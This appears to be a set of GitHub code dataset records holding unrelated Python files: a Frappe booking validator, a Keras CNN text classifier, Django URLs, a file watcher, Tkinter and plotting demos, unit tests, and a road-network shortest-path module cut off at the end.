in users)\n\n def get_user_photo(self, user: User):\n try:\n photos = list(filter(lambda f: isfile(join(self._path, f)) and\n f.endswith(('.jpeg', '.jpg', '.png', '.JPG')) and\n f.startswith(user.key_id),\n listdir(self._path)))\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.exception(e)\n return None\n\n if len(photos)==0:\n return None\n\n with open(self._path + photos[0], 'rb') as pic:\n return pic.read()\n\n def get_unidentified_users(self) -> List[User]:\n try:\n users = [User(user.strSID,\n user.strFirstName+' '+user.strLastName,\n Vector(''))\n for user in self._FlexDB.GetUsers(\"\", False, \"\")]\n\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.exception(e)\n return None\n\n return users\n","repo_name":"BeanSecurity/octagram-biometric-identification-module","sub_path":"services/ACS.py","file_name":"ACS.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2867931868","text":"import frappe\nfrom frappe.model.document import Document\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom collections import namedtuple\nRange = namedtuple('Range', ['start', 'end'])\n\n\nclass GymTrainerBooking(Document):\n\tpass\n\n\n@frappe.whitelist() \ndef get_roles(email):\n\temail=frappe.session.user\n\troles = frappe.get_roles(email)\n\tprint(f'\\n\\nROLES={roles}\\n\\n')\n\tfor item in roles:\n\t\tif item == 'Gym Admin': return 'ADMIN'\n\treturn 'USER'\n\n\n\n@frappe.whitelist()\ndef validate(name,gym_trainer,start_date_and_time,duration_in_hours):\n\tprint (f'START DATE AND TIME: {start_date_and_time}')\n\tstart_date=datetime.strptime(start_date_and_time,'%Y-%m-%d %H:%M:%S')\n\tend_date=start_date + timedelta(hours = int(duration_in_hours))\n\tr1 = Range(start=start_date, end=end_date)\n\tprint(f'VALIDATE {gym_trainer},{start_date},{end_date}')\n\tdocList=frappe.db.get_list('Gym Trainer Booking',filters={'gym_trainer':gym_trainer,},fields=['name','start_date_and_time', 'duration_in_hours'])\n\tfor item in docList:\n\t\titemEndDate=item.start_date_and_time+timedelta(hours = int(item.duration_in_hours))\n\t\tprint(f'COMPARING {item.name},{item.start_date_and_time},{itemEndDate},{item.duration_in_hours}')\n\t\tif (item.name == name): \n\t\t\tprint('CONTINUE')\n\t\t\tcontinue\n\t\tr2 = Range(start=item.start_date_and_time, end=itemEndDate)\n\t\tlatest_start = max(r1.start, r2.start)\n\t\tearliest_end = min(r1.end, r2.end)\n\t\toverlap=0\n\t\tif latest_start < earliest_end:\n\t\t\toverlap = 1\n\t\tprint(f'TRAINER BOOKING {overlap}')\n\t\tif overlap > 0:\n\t\t\t#msg = f'Trainer is already booked for that date range'\n\t\t\t#frappe.throw(msg)\n\t\t\treturn 1\n\tdateStr=str(start_date.year)+'-'\n\tif start_date.month < 10: dateStr += '0'\n\tdateStr+=str(start_date.month)+'-'\n\tif start_date.day < 10: dateStr += '0'\n\tdateStr+=str(start_date.day)+' '\n\tif start_date.hour < 10: dateStr += '0'\n\tdateStr+=str(start_date.hour)+':00:00'\n\treturn dateStr\n","repo_name":"andygarcia830/fgarcia_frappe_eval","sub_path":"fgarcia_frappe_eval/fgarcia_frappe_eval/doctype/gym_trainer_booking/gym_trainer_booking.py","file_name":"gym_trainer_booking.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35404627803","text":"import os\nimport pickle\nimport argparse\nimport numpy as np\nimport pandas as po\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n#from tensorflow.keras.layers import Embedding, Input, Dense, GlobalMaxPooling1D, Conv1D, MaxPooling1D, Flatten, TimeDistributed, LSTM, Bidirectional, Reshape\nfrom tensorflow.keras.layers import Embedding, Input, Dense, Conv2D, Reshape, MaxPooling2D, Flatten, Dropout\n\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\n\nfrom sklearn.metrics import f1_score\n\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\n\ndef fit_tokenizer(args, df):\n\t#df['Text'] = df['questionText'] + ' ' + df['answerText'] \n\n\ttexts = []\n\ttexts += df['text'].to_list()\n\ttexts += df['meta'].to_list()\n\n\ttokenizer = Tokenizer(num_words=args.vocab_size)\n\ttokenizer.fit_on_texts(texts)\n\n\treturn tokenizer\n\ndef make_embedding_layer(args, tokenizer):\n\tword_index = tokenizer.word_index\n\n\twith open('data/word2emb.pkl', 'rb') as f:\n\t\tword2emb = pickle.load(f)\n\n\tembedding_matrix = np.zeros((len(word_index) + 1, 300)) # words not found in embedding index will be all-zeros.\n\tfor word, i in word_index.items():\n\t\tembedding_vector = word2emb.get(word)\n\t\tif embedding_vector is not None:\n\t\t\tembedding_matrix[i] = embedding_vector\n\n\tGloVe = Embedding(len(word_index) + 1, 300, weights=[embedding_matrix], input_length=args.max_seq_len, trainable=True)\n\n\treturn GloVe\n\ndef get_train_val_test(args, df, tokenizer):\n\tsequences \t\t= tokenizer.texts_to_sequences(df['text'].to_list())\n\tmeta \t\t\t= tokenizer.texts_to_sequences(df['meta'].to_list())\n\n\tdata \t\t\t= pad_sequences(sequences, maxlen=args.max_seq_len)\n\tmeta \t\t\t= pad_sequences(meta, maxlen=args.max_seq_len)\n\n\tlabels \t\t\t= df['target'].to_list()\n\tlabels \t\t\t= to_categorical(np.asarray(labels))\t\n\n\tstacked_data = []\n\tfor i in range(len(data)):\n\t\tstacked_data.append(np.vstack((data[i], meta[i])))\n\t\t\n\tstacked_data = np.array(stacked_data)\n\n\tX_train \t\t= stacked_data[:int(args.train_percent*len(stacked_data))].reshape(-1, args.max_seq_len, 2)\n\tX_val \t\t\t= stacked_data[int(args.train_percent*len(stacked_data)):int(args.val_percent*len(stacked_data))].reshape(-1, args.max_seq_len, 2)\n\tX_test\t\t\t= stacked_data[int(args.val_percent*len(stacked_data)):].reshape(-1, args.max_seq_len, 2)\n\n\ty_train \t\t= labels[:int(args.train_percent*len(labels))]\n\ty_val \t\t\t= labels[int(args.train_percent*len(labels)):int(args.val_percent*len(labels))]\n\ty_test \t\t\t= labels[int(args.val_percent*len(labels)):]\n\n\treturn (X_train, y_train), (X_val, y_val), (X_test, y_test)\n\ndef build_model(args, GloVe, use_meta):\n\tsequence_input = Input(shape=(args.max_seq_len, 2), dtype='int32')\n\n\ttext_in = sequence_input[:, :, 0]\n\tx = GloVe(text_in)\n\tx = Reshape((350, 300, 1))(x)\n\tx = Conv2D(256, 5, activation='tanh')(x)\n\tx = MaxPooling2D((46, 296))(x)\n\tx = Flatten()(x)\n\tx = Dropout(0.2)(x)\n\t\n\tmeta_in = sequence_input[:, :, 1]\n\tm = GloVe(meta_in)\n\tm = Reshape((350, 300, 1))(m)\n\tm = Conv2D(256, 5, activation='tanh')(m)\n\tm = MaxPooling2D((46, 296))(m)\n\tm = Flatten()(m)\n\tm = Dropout(0.2)(m)\n\t\n\tif use_meta:\n\t\tout = tf.keras.backend.concatenate((x, m), axis=1)\n\t\n\telse:\n\t\tout = x\n\n\tpreds = Dense(2, activation='softmax')(out)\n\n\tmodel = Model(sequence_input, preds)\n\t\n\toptimizer = tf.keras.optimizers.Adam(lr=0.001)\n\tmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n\tmodel.summary()\n\n\treturn model\n\ndef preprocess_json(json_path, data_path):\n\tprint('Processed data for dataset not found, preprocessing json file {}'.format(json_path))\n\n\twith open('data/data_v2/Auto_meta_qar.pkl', 'rb') as f:\n\t\tdata = pickle.load(f)\n\n\tX = []\n\ty = []\n\n\tdf = po.DataFrame()\n\tfor key in tqdm(data, total=len(data)):\n\t\trow = data[key]\n\n\t\tmeta = ' '.join([row['title'], ' '.join(row['category']), ' '.join(row['description'])])\n\t\t\n\t\tfor i in range(len(row['questions_answers'])):\n\t\t\tdf_row = {}\n\t\t\tdf_row['meta'] = meta\n\n\t\t\tques = row['questions_answers'][i][0]\n\t\t\treviews = ' '.join(row['questions_answers'][i][2])\n\t\t\tdf_row['text'] = ' '.join([ques, reviews])\n\n\t\t\ttarget = row['questions_answers'][i][1]\n\t\t\tif target == 'Y':\n\t\t\t\tdf_row['target'] = 1 \n\t\t\telif target == 'N':\n\t\t\t\tdf_row['target'] = 0\n\t\t\telse:\n\t\t\t\traise ValueError\n\t\t\n\t\t\tdf = df.append(df_row, ignore_index=True)\n\n\tprint('Saved Processed data at {}'.format(data_path))\n\t\n\tdf.to_csv(data_path, index=False)\n\ndef get_data(dataset_name):\n\tif dataset_name == 'auto':\n\t\tdata_path = 'data/Auto_meta_qar.csv'\n\t\tjson_path = 'data/raw_json_data/Auto_meta_qar.pkl'\n\telif dataset_name == 'electronics':\n\t\tdata_path = 'data/electronics_meta_qar.csv'\n\t\tjson_path = 'data/raw_json_data/electronics_meta_qar.pkl'\n\telif dataset_name == 'home':\n\t\tdata_path = 'data/home_meta_qar.csv'\n\t\tjson_path = 'data/raw_json_data/home_meta_qar.pkl'\n\n\tif not os.path.exists(data_path):\n\t\tpreprocess_data(json_path, data_path)\n\n\tprint('Loading dataset {}'.format(data_path))\n\tdf = po.read_csv(data_path).sample(frac=1)\n\n\treturn df\n\ndef main(args):\n\tprint('Running CNN model for {} dataset'.format(args.dataset_name))\n\tprint('Using Metadata - {}'.format(args.use_meta))\n\n\tdf = get_data(args.dataset_name)\n\n\ttokenizer = fit_tokenizer(args, df)\n\tGloVe = make_embedding_layer(args, tokenizer)\n\n\t(X_train, y_train), (X_val, y_val), (X_test, y_test) = get_train_val_test(args, df, tokenizer)\n\n\t#'''\n\tmodel = build_model(args, GloVe, use_meta=args.use_meta)\n\n\tearlystop = tf.keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0.001, patience=10)\n\tmodel_checkpoint = tf.keras.callbacks.ModelCheckpoint(filepath='cnn_{}_{}_best_model.hdf5'.format(args.dataset_name, args.use_meta), monitor='val_loss', save_best_only=True, save_weights_only=True)\n\n\thist = model.fit(X_train, y_train, validation_data=(X_val, y_val), epochs=100, batch_size=4, callbacks=[earlystop, model_checkpoint], shuffle=True)\n\n\tos.makedirs('training_history', exist_ok=True)\n\twith open('training_history/cnn_{}_{}_best_model.hdf5'.format(args.dataset_name, args.use_meta), 'wb') as f:\n\t\tpickle.dump(hist.history, f)\n\n\ty_pred = model.predict(X_test)\n\n\ty_pred = np.argmax(y_pred, axis = 1)\n\ty_test = np.argmax(y_test, axis = 1)\n\tprint(f1_score(y_test, y_pred))\n\n\tif not os.path.exists('results.csv'):\n\t\tresults_df = po.DataFrame()\n\telse:\n\t\tresults_df = po.read_csv('results.csv')\n\n\trow = {}\n\trow['model'] = 'cnn'\n\trow['dataset_name'] = args.dataset_name\n\trow['use_meta'] = args.use_meta\n\trow['final f1_score'] = f1_score(y_test, y_pred)\n\tresults_df = results_df.append(row, ignore_index=True)\n\t\n\tresults_df.to_csv('results.csv', index=False)\n\n\t#'''\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser() \n\t\t\n\tparser.add_argument('-dataset_name', type=str, default='auto', choices=['auto', 'electronics', 'home'])\n\tparser.add_argument('-use_meta', type=bool, default=False, choices=[True, False])\n\n\t#parser.add_argument('-data_path', type=str, default='data/electronics_meta_qar.csv')\n\tparser.add_argument('-vocab_size', type=int, default=1000000)\n\tparser.add_argument('-max_seq_len', type=int, default=350) #for default size -> average + 3 stds of lengths is 350\n\n\tparser.add_argument('-train_percent', type=float, default=0.7)\n\tparser.add_argument('-val_percent', type=float, default=0.9)\n\t#parser.add_argument('-test_percent', type=float, default=0.1)\n\n\targs = parser.parse_args()\n\n\tmain(args)\n\n'''\n\nprint('##', len(tokenizer.word_index))\n\nprint(sequences[0])\n\nword_index \nprint('Found %s unique tokens.' % len(word_index))\n\n\n\nprint(data[0])\n\nprint(len(sequences))\nprint(len(data))\n\n#labels = to_categorical(np.asarray(labels))\nprint('Shape of data tensor:', data.shape)\n#print('Shape of label tensor:', labels.shape)\n'''","repo_name":"vmm221313/Amazon_QA","sub_path":"main_cnn.py","file_name":"main_cnn.py","file_ext":"py","file_size_in_byte":7861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32017447147","text":"# A second way of sorting a list in Python is to use the built-in function sorted().\r\n# The sorted() function is different from the .sort() method in two ways --\r\n# 1. It comes before a list, instead of after as all built-in functions do.\r\n# 2. It generates a new list rather than modifying the one that already exists.\r\n\r\nnamesOnList = [\r\n \"Will Smith\", \r\n \"Carlton Banks\", \r\n \"Hilary Banks\", \r\n \"Ashley Banks\", \r\n \"Philip Banks\", \r\n \"Vivian Banks\", \r\n \"Geoffrey Butler\"\r\n]\r\n\r\n# Using sorted(), I can create a new list, called characterNames --\r\n\r\ncharacterNames = sorted(namesOnList)\r\nprint(characterNames)\r\n\r\n# OUTPUT: [\r\n# 'Ashley Banks', \r\n# 'Carlton Banks', \r\n# 'Geoffrey Butler', \r\n# 'Hilary Banks', \r\n# 'Philip Banks', \r\n# 'Vivian Banks', \r\n# 'Will Smith'\r\n# ]\r\n\r\n# Note: Using sorted did not change namesOnList --\r\n\r\nprint(namesOnList)\r\n\r\n# OUTPUT: [\r\n# 'Will Smith', \r\n# 'Vivian Banks', \r\n# 'Philip Banks', \r\n# 'Hilary Banks', \r\n# 'Geoffrey Butler', \r\n# 'Carlton Banks', \r\n# 'Ashley Banks'\r\n# ]\r\n\r\ngames = [\"Grand Theft Auto\", \"Doom Eternal\", \"Watch Dogs\", \"Assassin's Creed\", \"SimCity4000\"]\r\n\r\nsortedGames = sorted(games)\r\nprint(games)\r\nprint(sortedGames)\r\n\r\n# OUTPUT: games = ['Grand Theft Auto', 'Doom Eternal', 'Watch Dogs', \"Assassin's Creed\", 'SimCity4000']\r\n# OUTPUT: sortedGames = [\"Assassin's Creed\", 'Doom Eternal', 'Grand Theft Auto', 'SimCity4000', 'Watch Dogs']","repo_name":"IdSolomon/python_lists","sub_path":"sorting_lists2.py","file_name":"sorting_lists2.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29360765392","text":"\nfrom django.conf.urls import patterns, url\nfrom buglocator import views\nfrom django.conf import settings\n\nurlpatterns = patterns('buglocator.views',\n url(r'^dashboard/$','list',name='list'),\n url(r'^user/$','login',name='login'),\n url(r'^registration/$','registration',name='registration'),\n url(r'^$','homepage',name='homepage'),\n url(r'^reportbug/$','reportbug',name='reportbug'), \n url(r'^locatebug/$','locatebug',name='locatebug'),\n url(r'^showbug/(?P\\d+)$','showbug',name='showbug'),\n)\n","repo_name":"beerdotpy/Bug-Locator","sub_path":"minor/minorproject/buglocator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41388643277","text":"from os import path\nfrom glob import glob\nimport tempfile\n\nimport numpy as np\nfrom tempfile import TemporaryDirectory, NamedTemporaryFile\nimport torch as ch\nfrom torch.utils.data import Dataset\nimport webdataset as wds\n\nfrom ffcv import DatasetWriter\nfrom ffcv.reader import Reader\nfrom ffcv.fields import IntField, FloatField\nfrom test_writer import validate_simple_dataset\n\nfield_names = [\n 'index',\n 'value.pyd'\n]\n\nclass DummyDataset(Dataset):\n\n def __init__(self, l):\n self.l = l\n\n def __len__(self):\n return self.l\n\n def __getitem__(self, index):\n if index >= self.l:\n raise IndexError()\n return (index, np.sin(index))\n\ndef write_webdataset(folder, dataset, field_names):\n pattern = path.join(folder, \"dataset-%06d.tar\")\n writer = wds.ShardWriter(pattern, maxcount=20)\n with writer as sink:\n for i, sample in enumerate(dataset):\n data = {\n '__key__': f'sample_{i}'\n }\n\n for field_name, value in zip(field_names, sample):\n data[field_name] = value\n sink.write(data)\n\n\ndef pipeline(dataset):\n return (dataset\n .decode()\n .to_tuple(*field_names)\n )\n\nif __name__ == '__main__':\n N = 1007\n dataset = DummyDataset(N)\n with TemporaryDirectory() as temp_directory:\n with NamedTemporaryFile() as handle:\n fname = handle.name\n write_webdataset(temp_directory, dataset, field_names)\n files = glob(path.join(temp_directory, '*'))\n files = list(sorted(files))\n\n print(fname)\n writer = DatasetWriter(fname, {\n 'index': IntField(),\n 'value': FloatField()\n })\n\n writer.from_webdataset(files, pipeline)\n\n validate_simple_dataset(fname, N, shuffled=False)","repo_name":"libffcv/ffcv","sub_path":"tests/test_webdataset.py","file_name":"test_webdataset.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":2660,"dataset":"github-code","pt":"72"} +{"seq_id":"34027703066","text":"'''Crie um programa que leia uma frase qualquer e diga se ela é um palíndromo, desconsiderando os espaços.\r\nExemplos de palíndromos:\r\n\r\nAPOS A SOPA, A SACADA DA CASA, A TORRE DA DERROTA, O LOBO AMA O BOLO, ANOTARAM A DATA DA MARATONA.'''\r\n\r\nfrase = str(input('Digite uma frase: ')).strip().lower()\r\npalavras = frase.split()\r\njunto = ''.join(palavras)\r\ninverso = junto[::-1]\r\n\r\n#for i in range(len(junto) -1, -1, -1):\r\n# inverso += junto[i]\r\n\r\nprint(f'O contrário de {frase} é:', inverso)\r\nprint('É' if junto == inverso else 'Não é', 'um palíndromo')","repo_name":"Thisgrama/115-Exercicios-do-Curso-em-Video","sub_path":"Mundo 02/053 - Detector de palíndromo.py","file_name":"053 - Detector de palíndromo.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27374327006","text":"from django.urls import path, re_path\nfrom . import views\n\napp_name = 'accounting'\nurlpatterns = [\n re_path(r'^[a-z]{4,}/$', views.accounting_index, name='accounting_index'),\n re_path(r'^[a-z]{4,}/create/$', views.create_record, name='create'),\n re_path(r'^[a-z]{4,}/update/$', views.update_record, name='update'),\n re_path(r'^[a-z]{4,}/remove/$', views.remove_record, name='remove'),\n re_path(r'^[a-z]{4,}/fill/$', views.fill_database, name='fill_database'),\n re_path(r'^[a-z]{4,}/ajax/$', views.ajax, name='ajax'),\n re_path(r'^[a-z]{4,}/distribute/$', views.distribute, name='distribute'),\n]","repo_name":"timspeer/demo","sub_path":"Django/production_smitools/accounting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16810323006","text":"# Imports\n\nimport os\n\n# Exports\n\n__all__ = (\n \"get_modified_times\",\n \"Watcher\",\n)\n\n# Functions\n\n\ndef get_modified_times(path, extensions=None, follow_symlinks=True):\n \"\"\"Get the modified times for all files within a given path.\n\n :param path: The path to the files.\n :type path: str\n\n :param extensions: A list of extensions (including the dot) to be watched. If omitted, all extensions are watched.\n This parameter is optional, but recommended.\n :type extensions: list[str]\n\n :param follow_symlinks: Indicates whether symlinks should be followed.\n :type follow_symlinks: bool\n\n :rtype: collections.Iterable(time)\n :returns: Yields the last modified timestamp of each file.\n\n \"\"\"\n for root, dirs, files in os.walk(path, followlinks=follow_symlinks):\n for f in files:\n if extensions is not None:\n if f.endswith(tuple(extensions)):\n path = os.path.join(root, f)\n try:\n yield os.stat(path).st_mtime\n except OSError:\n pass\n else:\n path = os.path.join(root, f)\n try:\n yield os.stat(path).st_mtime\n except OSError:\n pass\n\n\n# Classes\n\n\nclass Watcher(object):\n \"\"\"A watcher may be used to determine if the contents of a directory or file has changed.\"\"\"\n\n def __init__(self, path, extensions=None, follow_symlinks=True):\n \"\"\"Initialize a watcher.\n\n :param path: The path to be watched. This may be a file or directory.\n :type path: str\n\n :param extensions: A list of extensions (including the dot) to be watched when ``path`` is a directory. If\n omitted, all extensions are watched. This parameter is optional, but recommended.\n :type extensions: list[str]\n\n :param follow_symlinks: Indicates whether symlinks should be followed.\n :type follow_symlinks: bool\n\n \"\"\"\n self.errors = list()\n self.extensions = extensions\n self.follow_symlinks = follow_symlinks\n self.last_modified_time = 0\n self.path = path\n self._is_directory = os.path.isdir(path)\n self._is_file = os.path.isfile(path)\n\n @property\n def exists(self):\n \"\"\"Indicates whether the watched path exists.\n\n :rtype: bool\n\n \"\"\"\n return os.path.exists(self.path)\n\n @property\n def is_directory(self):\n \"\"\"Indicates the path is a directory.\n\n :rtype: bool\n\n \"\"\"\n return self._is_directory\n\n @property\n def is_file(self):\n \"\"\"Indicates the path is a file.\n\n :rtype: bool\n\n \"\"\"\n return self._is_file\n\n def watch(self):\n \"\"\"Watch the path for changes.\n\n :rtype: collections.Iterable(bool| None)\n :returns: ``True`` when the path has changed.\n\n Watches the ``path`` for changes, trapping any errors encountered. It yields ``True`` or ``False`` to indicate\n a change (or not), or ``None`` when an error is encountered.\n\n \"\"\"\n if self.is_directory:\n while True:\n try:\n modified_time = max(get_modified_times(\n self.path,\n extensions=self.extensions,\n follow_symlinks=self.follow_symlinks)\n )\n if modified_time > self.last_modified_time:\n self.last_modified_time = modified_time\n yield True\n except ValueError as e:\n self.errors.append(\"Directory watcher failed: %s (%s)\" % (self.path, e))\n yield None\n else:\n yield False\n elif self.is_file:\n while True:\n try:\n modified_time = os.stat(self.path).st_mtime\n except OSError as e:\n self.errors.append(\"File watcher failed: %s (%s)\" % (self.path, e))\n yield None\n\n if modified_time > self.last_modified_time:\n self.last_modified_time = modified_time\n yield True\n else:\n yield False\n else:\n raise ValueError(\"%s is not a file or directory.\" % self.path)\n","repo_name":"develmaycare/python-commonkit","sub_path":"commonkit/watchers/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"138706472","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef visualize():\n data = pd.read_csv('Bangladesh_Landslide_Cleaned_Data.csv')\n\n month_occurence = data['month_number'].value_counts()\n month_occurence = month_occurence.sort_index()\n\n month_label = ['','January','February','March','April','May','June','July','August','September','October','November','December']\n\n months = []\n m_occurrences = []\n\n for i in month_occurence.index:\n months.append(month_label[i])\n m_occurrences.append(month_occurence[i])\n\n\n y_pos = np.arange(len(months))\n \n plt.barh(y_pos, m_occurrences, align='center', color='darkslategrey')\n plt.yticks(y_pos, months)\n plt.ylabel('Months')\n plt.xlabel('Number of Landslides')\n plt.title('Month vs Number of Landslides')\n plt.tight_layout()\n\n plt.rcParams['axes.facecolor']='#e0f2f1'\n plt.rcParams['savefig.facecolor']='#e0f2f1'\n\n plt.savefig('02_month_vs_nlandslides.png', dpi = 1000)\n # plt.show()","repo_name":"abdalimran/BD-Landslide-Data-Flask-REST-API","sub_path":"month_vs_nlandslides.py","file_name":"month_vs_nlandslides.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"9293648028","text":"import time\r\nfrom Tkinter import *\r\n\r\nclass AfterIdleExample:\r\n def __init__(self, master=None):\r\n self.master = master\r\n \r\n self.frame = Frame(master, relief=RAISED, borderwidth=2)\r\n Label(self.frame, text='Press the button\\nto start operation').pack()\r\n self.frame.pack(padx=4, pady=4)\r\n Button(master, text='Start', command=self.startOP).pack(side=TOP)\r\n\r\n def startOP(self):\r\n self.displayBusyCursor()\r\n time.sleep(10.0) # simulate a long operation\r\n \r\n def displayBusyCursor(self):\r\n self.master.configure(cursor='watch')\r\n self.master.update()\r\n self.master.after_idle(self.removeBusyCursor)\r\n \r\n def removeBusyCursor(self):\r\n self.master.configure(cursor='arrow')\r\n \r\nroot = Tk()\r\nroot.option_readfile('optionDB2')\r\nroot.title('Busy Cursor')\r\nexample = AfterIdleExample(root)\r\nroot.mainloop()\r\n","repo_name":"JoseRFJuniorBigData/PythonBooks","sub_path":"Python & TKinter Programming/Examples/Chapter18/busy_cursor.py","file_name":"busy_cursor.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"32544106020","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Authors: Andrea Azzarone \n#\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_fold.public.blocks as td\nimport unittest\n\nimport sequence_transcoder\n\n\nclass TestSequenceTranscoder(unittest.TestCase):\n\n def test_sequence_length(self):\n st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 3)\n self.assertEqual(len(st.eval([\"hello\", \"world\"])), 2)\n self.assertEqual(len(st.eval([\"hello\", \"world\", \"ciao\", \"mondo\"])), 4)\n self.assertEqual(len(st.eval([\"hello\", \"world\", \"unknown_word\"])), 3)\n\n def test_word_embedding_size(self):\n st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 3)\n sequence = st.eval([\"hello\", \"world\"])\n self.assertEqual([len(w) for w in sequence], [3,3])\n \n st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 5)\n sequence = st.eval([\"hello\", \"world\"])\n self.assertEqual([len(w) for w in sequence], [5,5])\n\n def test_same_word_embedding(self):\n st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 3)\n sequence1 = st.eval([\"hello\", \"world\", \"hello\"])\n sequence2 = st.eval([\"hello\", \"world\", \"hello\"])\n self.assertTrue(np.array_equal(sequence1[0], sequence1[2]))\n self.assertTrue(np.array_equal(sequence1, sequence2))\n\n def test_unknown_word(self):\n st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 3)\n sequence1 = st.eval([\"unknown_word1\", \"world\", \"unknown_word2\"])\n sequence2 = st.eval([\"unknown_word3\", \"world\", \"unknown_word4\"])\n self.assertTrue(np.array_equal(sequence1[0], sequence1[2]))\n self.assertTrue(np.array_equal(sequence1, sequence2))\n\n\nif __name__ == '__main__':\n sess = tf.InteractiveSession()\n unittest.main()\n","repo_name":"azzar1/context2vec","sub_path":"src/test_sequence_transcoder.py","file_name":"test_sequence_transcoder.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"694484496","text":"import heapq\r\n\r\nroad_types={1:40,2:80,3:110}\r\n#roads has three types\r\n#1=between 20 and 60\r\n#2=80->between 60 and 100\r\n#3=110->between 100 and 120\r\n#speed of roads will be thair average of min and max speed\r\n\r\nareas={} #a dictionary that saves areas,key is name and value is object of area\r\nadded_data = \"\" #a string for recording roads and areas to be exported easily\r\n\r\n\r\n#creating classes\r\n#creating area class\r\nclass area:\r\n def __init__(self,name):\r\n self.name=name\r\n self.ways=set(())#this attribute will show every area neighborhoods and road that connected them\r\n #fromat will be-->{(area1,road1),(area2,road2),(area3,road3),...}\r\n \r\n#creating road class\r\nclass road:\r\n def __init__(self,name,length,rtype):\r\n self.name=name\r\n self.length=length\r\n self.speed=road_types[rtype]\r\n\r\n\r\ndef add_area(name , positionX , positionY , width , length , height):\r\n '''this function will act like an api,it will create an area instance and save its data for exporting data file '''\r\n areas[name]=area(name)\r\n global added_data\r\n added_data=added_data+f'{name},{positionX},{positionY},{width},{length},{height}\\n'\r\n\r\n\r\ndef add_road(name,area1,area2,length,rtype):\r\n '''this function will act like an api,it will create a road instance and save its data for exporting data file '''\r\n current_road=road(name,length,rtype)\r\n areas[area1].ways.add((areas[area2],current_road))\r\n areas[area2].ways.add((areas[area1],current_road))\r\n \r\n global added_data\r\n added_data=added_data+f'{name},{area1},{area2},{length},{rtype},ROAD\\n'\r\n \r\ndef shortest_path(starting_area,destination):\r\n '''this function will find shortest path and its length using dijkstra's algorithm with heap''' \r\n pq =[]\r\n dist={}\r\n path={}\r\n dist[starting_area]=0\r\n path[starting_area]=(starting_area,)\r\n heapq.heappush(pq, (0, starting_area))\r\n \r\n while pq:\r\n current=heapq.heappop(pq)[1]\r\n for city,road in areas[current].ways:\r\n city_name=city.name\r\n if dist.setdefault(city_name,float('inf')) > dist[current]+road.length:\r\n dist[city_name]=dist[current]+road.length\r\n heapq.heappush(pq, (dist[city_name], city_name))\r\n path[city_name]=path[current]+(road.name,city_name)\r\n \r\n return {'path':path[destination],'distance':dist[destination]}\r\n\r\ndef fastest_path(starting_area,destination):\r\n '''this function will find fastest path and its time using dijkstra's algorithm''' \r\n pq =[]\r\n time={}\r\n path={}\r\n time[starting_area]=0\r\n path[starting_area]=(starting_area,)\r\n heapq.heappush(pq, (0, starting_area))\r\n while pq:\r\n current=heapq.heappop(pq)[1]\r\n for city,road in areas[current].ways:\r\n city_name=city.name\r\n if time.setdefault(city_name,float('inf')) > time[current]+(road.length/road.speed):\r\n time[city_name]=time[current]+(road.length/road.speed)\r\n heapq.heappush(pq, (time[city_name], city_name))\r\n path[city_name]=path[current]+(road.name,city_name)\r\n \r\n return {'path':path[destination],'time':time[destination]}\r\n\r\ndef export_data(file_path='data.csv'):\r\n global added_data\r\n try:\r\n file=open(file_path,'wt')\r\n file.write(added_data)\r\n file.close()\r\n return True\r\n except:\r\n return 